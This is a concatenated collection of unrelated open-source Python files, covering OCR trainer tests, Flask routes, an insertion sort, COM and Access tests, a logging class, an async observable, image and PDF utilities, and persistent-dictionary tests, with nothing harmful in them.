                                  evaluation_data=evaluation_data)
        module.setup()
        self.assertEqual(module.nn.seg_type, 'baselines')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
        self.assertEqual(len(module.train_set.dataset), 44)
        self.assertEqual(len(module.val_set.dataset), 44)
        trainer = KrakenTrainer(max_steps=1)
    def test_krakentrainer_rec_bl_dict(self):
        """
        Tests recognition trainer constructor with dictionary style training data.
        """
        training_data = [{'image': resources / 'bw.png', 'text': 'foo', 'baseline': [[10, 10], [300, 10]], 'boundary': [[10, 5], [300, 5], [300, 15], [10, 15]]}]
        evaluation_data = [{'image': resources / 'bw.png', 'text': 'foo', 'baseline': [[10, 10], [300, 10]], 'boundary': [[10, 5], [300, 5], [300, 15], [10, 15]]}]
        module = RecognitionModel(format_type=None,
                                  training_data=training_data,
                                  evaluation_data=evaluation_data)
        module.setup()
        self.assertEqual(module.nn.seg_type, 'baselines')
        self.assertIsInstance(module.train_set.dataset, kraken.lib.dataset.PolygonGTDataset)
        trainer = KrakenTrainer(max_steps=1)
| StarcoderdataPython |
3324171 | <gh_stars>0
from flask import Flask, Blueprint, render_template, abort, g, request
privacy_policy = Blueprint("privacy_policy", __name__)
@privacy_policy.route('/')
def loadTerms():
    """Render the privacy policy index page for the blueprint root."""
    return render_template('/privacy_policy/index.html')
| StarcoderdataPython |
4829526 | # This script will implement the INSERTION-SORT
# from the Algorithms (MIT) book
#####################################################|
#IMPORTS |
#____________________________________________________|
from random import shuffle
#####################################################|
#FUNCTIONS |
#____________________________________________________|
#####################################################|
#DATA |
#____________________________________________________|
# NOTE: this script is Python 2 (print statements, xrange, list-returning
# range); it will not run unmodified under Python 3.
A = range(-10,50)
shuffle(A)
print A

#####################################################|
#BODY OF SCRIPT                                      |
#____________________________________________________|

# Classic INSERTION-SORT (CLRS): maintain a sorted prefix A[0..j-1] and
# insert A[j] into its place by shifting larger elements one slot right.
for j in xrange(1,len(A)):
    key = A[j]
    #Insert A[j] into the sorted sequence A[1... j-1]
    i = j - 1
    while (i>-1) and A[i] > key: #Flip the second inequality and you will get a largest to smallest sequence
        A[i+1] = A[i]  # shift the larger element right
        i = i -1
    A[i+1] = key  # drop the key into the opened gap

print A
| StarcoderdataPython |
8055460 | <reponame>zuhorski/EPL_Project
#
# This assumes that you have MSAccess and DAO installed.
# You need to run makepy.py over "msaccess.tlb" and
# "dao3032.dll", and ensure the generated files are on the
# path.
# You can run this with no args, and a test database will be generated.
# You can optionally pass a dbname on the command line, in which case it will be dumped.
import pythoncom
from win32com.client import gencache, constants, Dispatch
import win32api
import os, sys
def CreateTestAccessDatabase(dbname = None):
    """Create a throwaway MS Access database via COM and return its filename.

    Builds two tables, a unique index, a cascading relationship, inserts two
    rows, and exercises DAO bookmarks (VT_SAFEARRAY|VT_UI1 round-tripping).
    NOTE(review): "<NAME>" field names are dataset-anonymization residue;
    the originals were presumably "First Name"/"Last Name" - confirm.
    """
    # Creates a test access database - returns the filename.
    if dbname is None:
        dbname = os.path.join( win32api.GetTempPath(), "COMTestSuiteTempDatabase.mdb" )
    access = Dispatch("Access.Application")
    dbEngine = access.DBEngine
    workspace = dbEngine.Workspaces(0)
    try:
        os.unlink(dbname)
    except os.error:
        print("WARNING - Unable to delete old test database - expect a COM exception RSN!")
    newdb = workspace.CreateDatabase( dbname, constants.dbLangGeneral, constants.dbEncrypt )
    # Create one test table.
    table = newdb.CreateTableDef("Test Table 1")
    table.Fields.Append( table.CreateField("First Name", constants.dbText ) )
    table.Fields.Append( table.CreateField("Last Name", constants.dbText ) )
    index = table.CreateIndex("UniqueIndex")
    index.Fields.Append( index.CreateField("First Name") )
    index.Fields.Append( index.CreateField("Last Name") )
    index.Unique = -1  # DAO boolean True
    table.Indexes.Append(index)
    newdb.TableDefs.Append( table )
    # Create a second test table.
    table = newdb.CreateTableDef("Test Table 2")
    table.Fields.Append( table.CreateField("First Name", constants.dbText ) )
    table.Fields.Append( table.CreateField("Last Name", constants.dbText ) )
    newdb.TableDefs.Append( table )
    # Create a relationship between them
    relation = newdb.CreateRelation("TestRelationship")
    relation.Table = "Test Table 1"
    relation.ForeignTable = "Test Table 2"
    field = relation.CreateField("<NAME>")
    field.ForeignName = "<NAME>"
    relation.Fields.Append( field )
    field = relation.CreateField("<NAME>")
    field.ForeignName = "<NAME>"
    relation.Fields.Append( field )
    relation.Attributes = constants.dbRelationDeleteCascade + constants.dbRelationUpdateCascade
    newdb.Relations.Append(relation)
    # Finally we can add some data to the table.
    tab1 = newdb.OpenRecordset("Test Table 1")
    tab1.AddNew()
    tab1.Fields("First Name").Value = "Mark"
    tab1.Fields("Last Name").Value = "Hammond"
    tab1.Update()
    tab1.MoveFirst()
    # We do a simple bookmark test which tests our optimized VT_SAFEARRAY|VT_UI1 support.
    # The bookmark will be a buffer object - remember it for later.
    bk = tab1.Bookmark
    # Add a second record.
    tab1.AddNew()
    tab1.Fields("First Name").Value = "Second"
    tab1.Fields("Last Name").Value = "Person"
    tab1.Update()
    # Reset the bookmark to the one we saved.
    # But first check the test is actually doing something!
    tab1.MoveLast()
    if tab1.Fields("First Name").Value != "Second":
        raise RuntimeError("Unexpected record is last - makes bookmark test pointless!")
    tab1.Bookmark = bk
    if tab1.Bookmark != bk:
        raise RuntimeError("The bookmark data is not the same")
    if tab1.Fields("First Name").Value != "Mark":
        raise RuntimeError("The bookmark did not reset the record pointer correctly")
    return dbname
def DoDumpAccessInfo(dbname):
    """Open *dbname* in MS Access via COM, dump its schema, and report
    open forms/reports. Always closes the database, swallowing COM errors
    raised during close."""
    from . import daodump
    a = forms = None
    try:
        sys.stderr.write("Creating Access Application...\n")
        a=Dispatch("Access.Application")
        print("Opening database %s" % dbname)
        a.OpenCurrentDatabase(dbname)
        db = a.CurrentDb()
        daodump.DumpDB(db,1)
        forms = a.Forms
        print("There are %d forms open." % (len(forms)))
        # Uncommenting these lines means Access remains open.
        #	for form in forms:
        #		print "	%s" % form.Name
        reports = a.Reports
        print("There are %d reports open" % (len(reports)))
    finally:
        if not a is None:
            sys.stderr.write("Closing database\n")
            try:
                a.CloseCurrentDatabase()
            except pythoncom.com_error:
                pass
# Generate all the support we can.
def GenerateSupport():
    """Generate makepy (early-bound) support for DAO and MS Access."""
    # dao
    gencache.EnsureModule("{00025E01-0000-0000-C000-000000000046}", 0, 4, 0)
    # Access
    #	gencache.EnsureModule("{4AFFC9A0-5F99-101B-AF4E-00AA003F0F07}", 0, 8, 0)
    gencache.EnsureDispatch("Access.Application")
def DumpAccessInfo(dbname):
    """Dump *dbname* twice: once late-bound (if no generated support exists
    yet), then again after ensuring makepy support, to exercise both paths."""
    amod = gencache.GetModuleForProgID("Access.Application")
    dmod = gencache.GetModuleForProgID("DAO.DBEngine.35")
    if amod is None and dmod is None:
        # No early-bound support yet: do a dynamic (late-bound) dump first.
        DoDumpAccessInfo(dbname)
        # Now generate all the support we can.
        GenerateSupport()
    else:
        sys.stderr.write("testAccess not doing dynamic test, as generated code already exists\n")
    # Now a generated version.
    DoDumpAccessInfo(dbname)
def test(dbname = None):
    """Entry point: create a scratch Access database if none given, then dump it.

    Skips (with a message) when the MSAccess type libraries are unavailable.
    """
    if dbname is None:
        # We need makepy support to create a database (just for the constants!)
        try:
            GenerateSupport()
        except pythoncom.com_error:
            print("*** Can not import the MSAccess type libraries - tests skipped")
            return
        dbname = CreateTestAccessDatabase()
        print("A test database at '%s' was created" % dbname)
    DumpAccessInfo(dbname)
if __name__=='__main__':
    import sys
    # NOTE(review): a relative import under __main__ only works when this
    # module is executed as part of its package (python -m ...).
    from .util import CheckClean
    dbname = None
    if len(sys.argv)>1:
        dbname = sys.argv[1]
    test(dbname)
    CheckClean()
| StarcoderdataPython |
4837268 | # !/usr/bin/env python
# coding=UTF-8
"""
@Author: <NAME>
@LastEditors: <NAME>
@Description:
@Date: 2021-08-31
@LastEditTime: 2021-11-11
文本文件日志
"""
import time
import os
import logging
from typing import NoReturn, Iterable, List, Optional, Any
import terminaltables
from .base import AttackLogger
from ..misc import nlp_log_dir
from EvalBox.Attack.TextAttack.attack_result import AttackResult
class TxtLogger(AttackLogger):
    """Logs the results of an attack to a file, or `stdout`.

    Wraps a dedicated ``logging.Logger`` ("NLPAttack-TxtLogger") with a file
    handler; optionally mirrors each result to the default logger when
    *stdout* is true.  NOTE(review): ``-> NoReturn`` throughout this class
    really means "returns None" (typing.NoReturn is for functions that never
    return) - kept as-is to match the codebase convention.
    """

    __name__ = "TxtLogger"

    def __init__(
        self,
        filename: Optional[str] = None,
        stdout: bool = False,
        color_method: str = "ansi",
    ) -> NoReturn:
        """Create the logger; *filename* defaults to a timestamped file under
        ``nlp_log_dir``. *color_method* is forwarded to AttackResult.__str__."""
        super().__init__()
        self.stdout = stdout
        self.filename = filename or os.path.join(
            nlp_log_dir, f"""{time.strftime("TxtLogger-%Y-%m-%d-%H-%M-%S.log")}"""
        )
        self.color_method = color_method
        if not stdout:
            self._clear_default_logger_handlers()
        # Make sure the log file's directory exists before attaching a handler.
        directory = os.path.dirname(self.filename)
        directory = directory if directory else "."
        if not os.path.exists(directory):
            os.makedirs(directory)
        self.fout = logging.getLogger("NLPAttack-TxtLogger")
        self.fout.setLevel(level=logging.INFO)
        self._init_file_handler()
        self._default_logger.info(f"Logging to text file at path {self.filename}")
        self._num_results = 0
        self._flushed = True

    @property
    def num_results(self) -> int:
        # Number of attack results logged so far.
        return self._num_results

    def _init_file_handler(self) -> NoReturn:
        """Attach a formatted INFO-level FileHandler for self.filename."""
        f_handler = logging.FileHandler(self.filename)
        f_handler.setLevel(logging.INFO)
        f_format = logging.Formatter(
            "%(asctime)s - %(name)s - %(levelname)s -\n %(message)s"
        )
        f_handler.setFormatter(f_format)
        self.fout.addHandler(f_handler)

    def __getstate__(self) -> dict:
        # Temporarily save file handle b/c we can't copy it
        state = {
            i: self.__dict__[i]
            for i in self.__dict__
            if i not in ["_default_logger", "fout"]
        }
        return state

    def __setstate__(self, state: dict) -> NoReturn:
        # Restore state, then rebuild the logger/handler that __getstate__
        # deliberately dropped (handles are not picklable).
        self.__dict__ = state
        if not self.stdout:
            self._clear_default_logger_handlers()
        self.fout = logging.getLogger("NLPAttack-TxtLogger")
        self.fout.setLevel(level=logging.INFO)
        self._init_file_handler()

    def log_attack_result(self, result: AttackResult, **kwargs: Any) -> NoReturn:
        """Write one numbered, banner-separated attack result to the file
        (and to the default logger when stdout mirroring is on)."""
        self._num_results += 1
        msg = "\n".join(
            [
                (" Result " + str(self.num_results)).center(110, "-"),
                result.__str__(color_method=self.color_method),
            ]
        )
        self.fout.info(msg)
        if self.stdout:
            self._default_logger.info(msg)
        self._flushed = False

    def log_summary_rows(self, rows: Iterable, title: str, window_id: str) -> NoReturn:
        """Log summary *rows*: as an ASCII table on stdout, or as plain
        "key value" lines in the file.  NOTE(review): *window_id* is unused
        here - it appears to exist for interface parity with other loggers."""
        if self.stdout:
            table_rows = [[title, ""]] + rows
            table = terminaltables.AsciiTable(table_rows)
            self._default_logger.info(table.table)
        else:
            msg = "\n".join([f"{row[0]} {row[1]}" for row in rows])
            self.fout.info(msg)

    def flush(self) -> NoReturn:
        """Flush every attached handler."""
        super().flush()
        for h in self.fout.handlers:
            h.flush()
        self._flushed = True

    def close(self) -> NoReturn:
        """Close and detach every handler.
        NOTE(review): removing handlers while iterating ``self.fout.handlers``
        mutates the list being iterated and can skip handlers - should iterate
        over a copy (``self.fout.handlers[:]``)."""
        super().close()
        for h in self.fout.handlers:
            h.close()
            self.fout.removeHandler(h)

    def extra_repr_keys(self) -> List[str]:
        """Attribute names to include in this logger's repr."""
        return [
            "filename",
            "stdout",
            "color_method",
        ]
| StarcoderdataPython |
8189678 | from typing import Generic, TypeVar, Iterable
import asyncio
import logging
from aioreactive.core import AsyncDisposable, AsyncCompositeDisposable
from aioreactive.core import AsyncObserver, AsyncObservable
from aioreactive.core import AsyncSingleStream, chain
log = logging.getLogger(__name__)
T = TypeVar('T')
class CatchException(AsyncObservable[T], Generic[T]):
    """Observable that runs through *iterable* of source observables,
    moving on to the next source whenever the current one errors, and
    completing when a source completes normally or the iterable is
    exhausted.

    Fix: removed the stray ``print("STOP")`` / ``print("NO STOP")`` debug
    statements that were left next to the proper ``log.debug`` calls -
    library code must not write to stdout.
    """

    def __init__(self, iterable) -> None:
        super().__init__()
        self._iterable = iter(iterable)
        self._subscription = None  # type: AsyncDisposable
        self._task = None  # type: asyncio.Future
        self._stop = False

    async def worker(self, observer: AsyncObserver) -> None:
        """Subscribe *observer* to the next source from the iterable."""
        def recurse(fut) -> None:
            # Runs when the current sink finishes: either the source closed
            # normally (_stop is True -> complete downstream) or it threw
            # (_stop reset by Stream.athrow -> chain to the next source).
            if self._stop:
                log.debug("CatchException._:stop")
                asyncio.ensure_future(observer.aclose())
            else:
                log.debug("CatchException._:continue to next iterable")
                self._task = asyncio.ensure_future(self.worker(observer))

        try:
            source = next(self._iterable)
        except StopIteration:
            # No more sources to try: complete downstream.
            await observer.aclose()
        except Exception as ex:
            await observer.athrow(ex)
        else:
            self._stop = True
            sink = CatchException.Stream(self)
            down = await chain(sink, observer)  # type: AsyncDisposable
            up = await chain(source, sink)
            sink.add_done_callback(recurse)
            self._subscription = AsyncCompositeDisposable(up, down)

    async def __asubscribe__(self, observer: AsyncObserver) -> AsyncDisposable:
        async def cancel() -> None:
            # Dispose the active chain and stop the worker task.
            log.debug("CatchException._:__asubscribe__ cancel")
            if self._subscription is not None:
                await self._subscription.adispose()
            if self._task is not None:
                self._task.cancel()

        self._task = asyncio.ensure_future(self.worker(observer))
        return AsyncDisposable(cancel)

    class Stream(AsyncSingleStream):
        """Intermediate stream that records how the current source ended."""

        def __init__(self, outer):
            super().__init__()
            self._outer = outer

        async def aclose(self) -> None:
            # Normal completion: tell the outer observable to stop chaining.
            log.debug("CatchException._:close()")
            self._outer._stop = True
            self.cancel()

        async def athrow(self, ex: Exception) -> None:
            # Error: clear the stop flag so recurse() tries the next source.
            log.debug("CatchException._:athrow()")
            self._outer._stop = False
            self.cancel()
def catch_exception(iterable: Iterable[T]) -> AsyncObservable[T]:
    """Return an observable that falls through *iterable* of sources,
    switching to the next source whenever the current one errors."""
    return CatchException(iterable)
| StarcoderdataPython |
8160596 | <filename>helpers/make_2D_zarr_pathology.py<gh_stars>0
import numpy as np
import zarr
from openslide import OpenSlide
# Convert the first three pyramid levels of a Camelyon16 whole-slide image
# into one chunked uint8 zarr dataset per level, written strip by strip.
slide = OpenSlide('data/camelyon16/tumor_001.tif')
file_name = 'data/camelyon16/tumor_001.zarr'
root = zarr.open_group(file_name, mode='a')
for i in range(0, 3):
    print(i, 10)
    # (width, height, RGBA) for this pyramid level
    shape = (slide.level_dimensions[i][0], slide.level_dimensions[i][1], 4)
    z1 = root.create_dataset(str(i), shape=shape, chunks=(300, 300, None),
                             dtype='uint8')
    # image = np.asarray(slide.read_region((0, 0), i,
    #                    slide.level_dimensions[i])).transpose(1, 0, 2)
    # z1[:] = image
    # Copy the level in 1528-pixel-wide vertical strips to bound memory use;
    # NOTE(review): a trailing strip narrower than 1528 px is never written.
    for j in range(slide.level_dimensions[i][0]//1528):
        print(j, slide.level_dimensions[i][0]/1528)
        # read_region takes level-0 coordinates, hence the 2**i scale factor.
        image = np.asarray(slide.read_region((j*1528*(2**i), 0), i,
                           (1528, slide.level_dimensions[i][1]))).transpose(1, 0, 2)
        z1[j*1528:(j+1)*1528] = image
| StarcoderdataPython |
8122428 | from PyPDF2 import PdfFileMerger
import os
def merger(pdfs, directory=".\\samples"):
    """Merge the named PDF files into ``result.pdf`` in the working directory.

    :param pdfs: iterable of PDF file names (not paths)
    :param directory: directory the names are relative to; defaults to the
        original hard-coded ``.\\samples`` location for backward compatibility
    Fixes: the local ``PdfFileMerger`` no longer shadows this function's own
    name; paths are built with ``os.path.join``; the merger is always closed,
    even if ``append``/``write`` raises.
    """
    print(pdfs)
    pdf_merger = PdfFileMerger(False)
    try:
        for pdf in pdfs:
            pdf_merger.append(os.path.join(directory, pdf))
        pdf_merger.write("result.pdf")
    finally:
        pdf_merger.close()
if __name__ == '__main__':
    # NOTE(review): the file names are listed from '../samples' here, but
    # merger() reads them from '.\\samples' - these two paths only agree
    # when the script runs from a directory where both resolve to the same
    # folder; confirm the intended location.
    pdfs = os.listdir('../samples')
    merger(pdfs)
| StarcoderdataPython |
5016671 | from flask import json
from isaac.models import Record
from isaac import app
# ==============================
# API DATATABLES + GLOBAL API(no-cors)
# ==============================
# этот роут использует таблица DataTables на главной странице
def _cors_json_response(payload):
    """Serialize *payload* as JSON and attach a permissive CORS header."""
    response = app.response_class(
        response=json.dumps(payload), mimetype="application/json"
    )
    response.headers["Access-Control-Allow-Origin"] = "*"
    return response


def _category_payload(key, category):
    """Build ``{key: [record dicts]}`` for every Record in *category*."""
    return {
        key: [
            user.to_dict()
            for user in Record.query.filter(Record.category == category)
        ]
    }


# этот роут использует таблица DataTables на главной странице
# (this route is used by the DataTables table on the main page)
@app.route("/api/cat_mother")
def cat_mother():
    """Records in the "mother" category."""
    return _cors_json_response(_category_payload("cat_mother", "mother"))


@app.route("/api/cat_blue_baby")
def cat_chest():
    """Records in the "blue_baby" category."""
    return _cors_json_response(_category_payload("cat_blue_baby", "blue_baby"))


@app.route("/api/cat_all_chapter")
def cat_all_chapter():
    """Records in the "all_chapter" category."""
    return _cors_json_response(_category_payload("cat_all_chapter", "all_chapter"))


@app.route("/api/all_cat")
def data():
    """Every record, serialized with the extended to_dict_all()."""
    payload = {"data": [user.to_dict_all() for user in Record.query]}
    return _cors_json_response(payload)


@app.route("/api/lost")
def cat_lost():
    """Records in the "lost" category."""
    return _cors_json_response(_category_payload("cat_lost", "lost"))


@app.route("/api/t_lost")
def cat_t_lost():
    """Records in the "t_lost" category."""
    return _cors_json_response(_category_payload("cat_t_lost", "t_lost"))
| StarcoderdataPython |
9685359 | <gh_stars>10-100
import unittest
import random
import threading
import System
from System.IO import Directory
from System.IO import Path
from System.Collections.Generic import Dictionary
from System.Collections.Generic import SortedDictionary
from System.Collections.Generic import SortedList
import clr
clr.AddReferenceByPartialName('Esent.Collections')
from Microsoft.Isam.Esent.Collections.Generic import PersistentDictionary
def deleteDirectory(directory):
    """Recursively delete *directory* if it exists (no-op otherwise).
    Uses .NET System.IO.Directory (this is IronPython code)."""
    if Directory.Exists(directory):
        Directory.Delete(directory, True)
class SingleDictionaryFixture(unittest.TestCase):
    """Basic CRUD tests against one string->string PersistentDictionary,
    recreated in a fresh data directory for every test."""

    def setUp(self):
        self._dataDirectory = 'SingleDictionaryFixture'
        self._deleteDataDirectory()
        self._dict = PersistentDictionary[System.String,System.String](self._dataDirectory)

    def tearDown(self):
        self._dict.Dispose()
        self._deleteDataDirectory()

    def _deleteDataDirectory(self):
        deleteDirectory(self._dataDirectory)

    def testInsertAndRetrieveRecord(self):
        self._dict['key'] = 'value'
        self.assertEqual(self._dict['key'], 'value')

    def testLargeKey(self):
        # esent may truncate the key, but we should be able to set all this data
        key = 'K' * 1024*1024
        self._dict[key] = 'value'
        self.assertEqual(self._dict[key], 'value')

    def testLargeValue(self):
        value = 'V' * 1024*1024
        self._dict['bigstuff'] = value
        self.assertEqual(self._dict['bigstuff'], value)

    def testNullKey(self):
        self._dict[None] = 'value'
        self.assertEqual(self._dict[None], 'value')

    def testNullValue(self):
        self._dict['key'] = None
        self.assertEqual(self._dict['key'], None)

    def testOverwriteRecord(self):
        self._dict['key'] = 'value'
        self._dict['key'] = 'newvalue'
        self.assertEqual(self._dict['key'], 'newvalue')

    def testContainsKeyReturnsFalseWhenKeyNotPresent(self):
        self.assertEqual(False, self._dict.ContainsKey('key'))

    def testContainsKeyReturnsTrueWhenKeyIsPresent(self):
        self._dict['key'] = 'value'
        self.assertEqual(True, self._dict.ContainsKey('key'))

    def testRemoveRemovesKey(self):
        self._dict['key'] = 'value'
        self.assertEqual(True, self._dict.Remove('key'))
        self.assertEqual(False, self._dict.ContainsKey('key'))

    def testRemoveReturnsFalseWhenKeyNotPresent(self):
        self.assertEqual(False, self._dict.Remove('key'))

    def testCountIsZeroWhenDictionaryIsEmpty(self):
        self.assertEqual(0, self._dict.Count)

    def testCountIncreasesWithInsert(self):
        self._dict['a'] = 'a'
        self._dict['b'] = 'b'
        self.assertEqual(2, self._dict.Count)

    def testLenDecreasesWithDelete(self):
        self._dict['a'] = 'a'
        self._dict['b'] = 'b'
        self._dict['c'] = 'c'
        self._dict.Remove('b')
        self.assertEqual(2, self._dict.Count)

    def testClearOnEmptyDictionary(self):
        self._dict.Clear()
        self.assertEqual(0, self._dict.Count)

    def testClearRemovesRecords(self):
        self._dict['b'] = 'b'
        self._dict['a'] = 'a'
        self._dict.Clear()
        self.assertEqual(0, self._dict.Count)
class DictionaryFixture(unittest.TestCase):
    """Lifecycle tests: multiple dictionaries, dispose, close/reopen."""

    def setUp(self):
        self._dataDirectory = 'DictionaryFixture'
        self._deleteDataDirectory()

    def tearDown(self):
        self._deleteDataDirectory()

    def _deleteDataDirectory(self):
        deleteDirectory(self._dataDirectory)

    # NOTE(review): missing the 'test' prefix, so unittest never runs this.
    def disposeCloseTwice(self):
        dict = PersistentDictionary[System.Guid,System.Int64](self._dataDirectory)
        dict.Dispose()
        dict.Dispose()

    def testMultipleDictionaries(self):
        dict1 = PersistentDictionary[System.Int32,System.String](self._dataDirectory + '\\a')
        dict2 = PersistentDictionary[System.String,System.Int32](self._dataDirectory + '\\b')
        dict1[0] = 'hello'
        dict2['world'] = 1
        self.assertEqual('hello', dict1[0])
        self.assertEqual(1, dict2['world'])
        dict1.Dispose()
        dict2.Dispose()

    def testCloseAndReopenEmptyDictionary(self):
        dict = PersistentDictionary[System.DateTime,System.UInt16](self._dataDirectory)
        dict.Dispose()
        dict = PersistentDictionary[System.DateTime,System.UInt16](self._dataDirectory)
        self.assertEqual(0, dict.Count)
        dict.Dispose()
class DictionaryComparisonFixture(unittest.TestCase):
    """Mirror every mutation into a .NET Dictionary and assert the
    PersistentDictionary always matches it."""

    def setUp(self):
        self._dataDirectory = 'DictionaryComparisonFixture'
        self._deleteDataDirectory()
        self._createDictionary()
        self._expected = Dictionary[System.String,System.String]()

    def tearDown(self):
        self._closeDictionary()
        self._deleteDataDirectory()

    def _createDictionary(self):
        self._dict = PersistentDictionary[System.String,System.String](self._dataDirectory)

    def _closeDictionary(self):
        self._dict.Dispose()

    def _deleteDataDirectory(self):
        deleteDirectory(self._dataDirectory)

    def _compareWithExpected(self):
        # Same count, and every expected key maps to the same value.
        self.assertEqual(self._expected.Count, self._dict.Count)
        for k in self._expected.Keys:
            self.assertEqual(self._expected[k], self._dict[k])

    def _insert(self, k, v):
        # Apply the same insert/overwrite to both dictionaries.
        self._expected[k] = v
        self._dict[k] = v

    def _delete(self, k):
        self._expected.Remove(k)
        self._dict.Remove(k)

    def _clear(self):
        self._expected.Clear()
        self._dict.Clear()

    def testEmptyDb(self):
        self._compareWithExpected()

    def testClear(self):
        for i in xrange(256):
            self._insert(str(i), repr(i))
        self._compareWithExpected()
        self._clear()
        self._compareWithExpected()

    def testInserts(self):
        self._insert('a', '1234')
        self._insert('z', '0xF00D')
        self._insert('mmmmmm', 'donuts')
        self._insert('IronPython', 'rocks')
        self._compareWithExpected()

    def testReplaceDelete(self):
        self._insert('0', '')
        self._insert('1', '1111111111')
        self._insert('2', '222222222')
        self._insert('3', '33333333')
        self._insert('4', '4444444')
        self._insert('5', '555555')
        self._insert('5', '555555')
        self._insert('5', 'foo')
        self._insert('2', 'bar')
        self._delete('4')
        self._compareWithExpected()

    def testCloseAndOpen(self):
        # Data must survive a dispose/reopen cycle.
        for i in xrange(16):
            self._insert(str(i), '?' * i)
        self._compareWithExpected()
        self._closeDictionary()
        self._createDictionary()
        self._compareWithExpected()

    def testKeyIsCaseInsensitive(self):
        self._insert('aaa', 'foo')
        self._insert('aAa', 'bar')
        self._compareWithExpected()

    def testKeyRespectsSpaces(self):
        self._insert(' x', 'foo')
        self._insert('x', 'bar')
        self._insert('x ', 'baz')
        self._compareWithExpected()

    def testKeyRespectsSymbols(self):
        self._insert('QQQ.', 'foo')
        self._insert('QQQ', 'bar')
        self._insert('-QQQ', 'baz')
        self._compareWithExpected()

    def testRandomOperations(self):
        # NOTE(review): the key alphabet was damaged by dataset
        # anonymization ('<KEY>'); restore the original character set.
        keys = '<KEY>'
        for i in xrange(12000):
            k = random.choice(keys) * random.randint(1,2)
            if random.random() < 0.005:
                # Occasionally cycle the dictionary to exercise persistence.
                self._closeDictionary()
                self._createDictionary()
            elif random.random() < 0.01:
                self._clear()
            elif random.random() < 0.20:
                if k in self._expected:
                    self._delete(k)
                else:
                    self._compareWithExpected()
            else:
                v = random.choice('XYZ#@$%*.') * random.randint(0,1024)
                self._insert(k,v)
        self._compareWithExpected()
class MultiThreadingFixture(unittest.TestCase):
    """Concurrent insert/replace/retrieve/delete tests against one shared
    string->string PersistentDictionary."""

    def setUp(self):
        self._dataDirectory = 'MultiThreadingFixture'
        self._deleteDataDirectory()
        self._dict = PersistentDictionary[System.String,System.String](self._dataDirectory)

    def tearDown(self):
        self._dict.Dispose()
        self._deleteDataDirectory()

    def _deleteDataDirectory(self):
        deleteDirectory(self._dataDirectory)

    def _insert(self, low, high) if False else None  # placeholder removed

    def _insertRange(self, low, high):
        # Insert str(i) -> str(i) for i in [low, high).
        for i in xrange(low, high):
            self._dict[str(i)] = str(i)

    def _deleteRange(self, low, high):
        for i in xrange(low, high):
            self._dict.Remove(str(i))

    def _retrieveAllRecords(self, n):
        """Check that key=value for all records and there are n records"""
        self.assertEqual(n, self._dict.Count)
        for i in self._dict:
            self.assertEqual(i.Key, i.Value)

    def _randomOperations(self):
        # NOTE(review): literal damaged by dataset anonymization ('<KEY>');
        # restore the original key alphabet.
        keys = '<KEY>'
        for i in xrange(10000):
            k = random.choice(keys) * random.randint(1,8)
            if random.random() < 0.10:
                self._dict.Remove(k)
            else:
                v = '#' * random.randint(256,1024)
                self._dict[k] = v

    def testMultiThreadedInserts(self):
        # Four threads each insert a disjoint 1000-key range.
        threads = [threading.Thread(target = self._insertRange, args = (x*1000, (x+1) * 1000)) for x in range(4)]
        for t in threads:
            t.start()
        d = {}
        for i in xrange(4000):
            d[str(i)] = str(i)
        for t in threads:
            t.join()
        self.assertEqual(len(d), self._dict.Count)
        for k in d.keys():
            self.assertEqual(d[k], self._dict[k])

    def testMultiThreadedReplaces(self):
        # Pre-fill with placeholder values, then overwrite concurrently.
        for i in xrange(4000):
            self._dict[str(i)] = 'XXXX'
        threads = [threading.Thread(target = self._insertRange, args = (x*1000, (x+1) * 1000)) for x in range(4)]
        for t in threads:
            t.start()
        d = {}
        for i in xrange(4000):
            d[str(i)] = str(i)
        for t in threads:
            t.join()
        self.assertEqual(len(d), self._dict.Count)
        for k in d.keys():
            self.assertEqual(d[k], self._dict[k])

    def testMultiThreadedRetrieves(self):
        n = 4000
        for i in xrange(n):
            self._dict[str(i)] = str(i)
        threads = [threading.Thread(target = self._retrieveAllRecords, args = (n,))]
        for t in threads:
            t.start()
        for t in threads:
            t.join()

    def testMultiThreadedDeletes(self):
        for i in xrange(4000):
            self._dict[str(i)] = str(i)
        threads = [threading.Thread(target = self._deleteRange, args = (x*1000, (x+1) * 1000)) for x in range(4)]
        for t in threads:
            t.start()
        for t in threads:
            t.join()
        self.assertEqual(0, self._dict.Count)

    def testRandomMultiThreadedOperations(self):
        threads = [threading.Thread(target = self._randomOperations) for x in range(8)]
        for t in threads:
            t.start()
        self._dict.Clear() # try a concurrent clear
        for t in threads:
            t.join()
class GenericDictionaryFixtureBase(unittest.TestCase):
    """Shared machinery for exercising PersistentDictionary against a .NET
    reference dictionary across many key/value type combinations.  Test
    methods are attached dynamically (see the setattr loop at module end)."""

    def _deleteDataDirectory(self):
        deleteDirectory(self._dataDirectory)

    def _add(self, expected, actual, k, v):
        """Add (k,v). This fails if k already exists."""
        actual.Add(k,v)
        expected.Add(k,v)

    def _set(self, expected, actual, k, v):
        """Set k = v."""
        actual[k] = v
        expected[k] = v

    def _remove(self, expected, actual, k):
        # Remove k from both; both must report the key was present.
        self.assertEqual(True, actual.Remove(k))
        self.assertEqual(True, expected.Remove(k))

    def _clear(self, expected, actual):
        actual.Clear()
        expected.Clear()

    def _checkKeyIsNotPresent(self, dict, k):
        # Every lookup surface must agree the key is absent.
        self.assertEqual(False, dict.Keys.Contains(k))
        self.assertEqual(False, dict.ContainsKey(k))
        self.assertEqual(False, dict.TryGetValue(k)[0])
        self.assertEqual(False, dict.Remove(k))

    def _checkDuplicateKeyError(self, dict, k, v):
        # Add() on an existing key must raise ArgumentException.
        self.assertRaises(System.ArgumentException, dict.Add, k, v)

    def _compareDictionaries(self, expected, actual):
        """Deep cross-check: counts, membership both ways, TryGetValue."""
        self.assertEqual(expected.Count, actual.Count)
        self.assertEqual(expected.Keys.Count, actual.Keys.Count)
        self.assertEqual(expected.Values.Count, actual.Values.Count)
        for i in expected:
            self.assertEqual(True, actual.Contains(i))
            self.assertEqual(True, actual.ContainsKey(i.Key))
            self.assertEqual(True, actual.ContainsValue(i.Value))
            self.assertEqual(True, actual.Keys.Contains(i.Key))
            self.assertEqual(True, actual.Values.Contains(i.Value))
            (f,v) = actual.TryGetValue(i.Key)
            self.assertEqual(True, f)
            self.assertEqual(i.Value, v)
            self.assertEqual(i.Value, actual[i.Key])
        for i in actual:
            self.assertEqual(True, expected.ContainsKey(i.Key))
        for k in actual.Keys:
            self.assertEqual(True, expected.ContainsKey(k))
        for v in actual.Values:
            self.assertEqual(True, expected.Values.Contains(v))

    def _doTest(self, expected, actual, keys, values):
        """Full CRUD workout of *actual* mirrored into *expected*."""
        # Compare empty
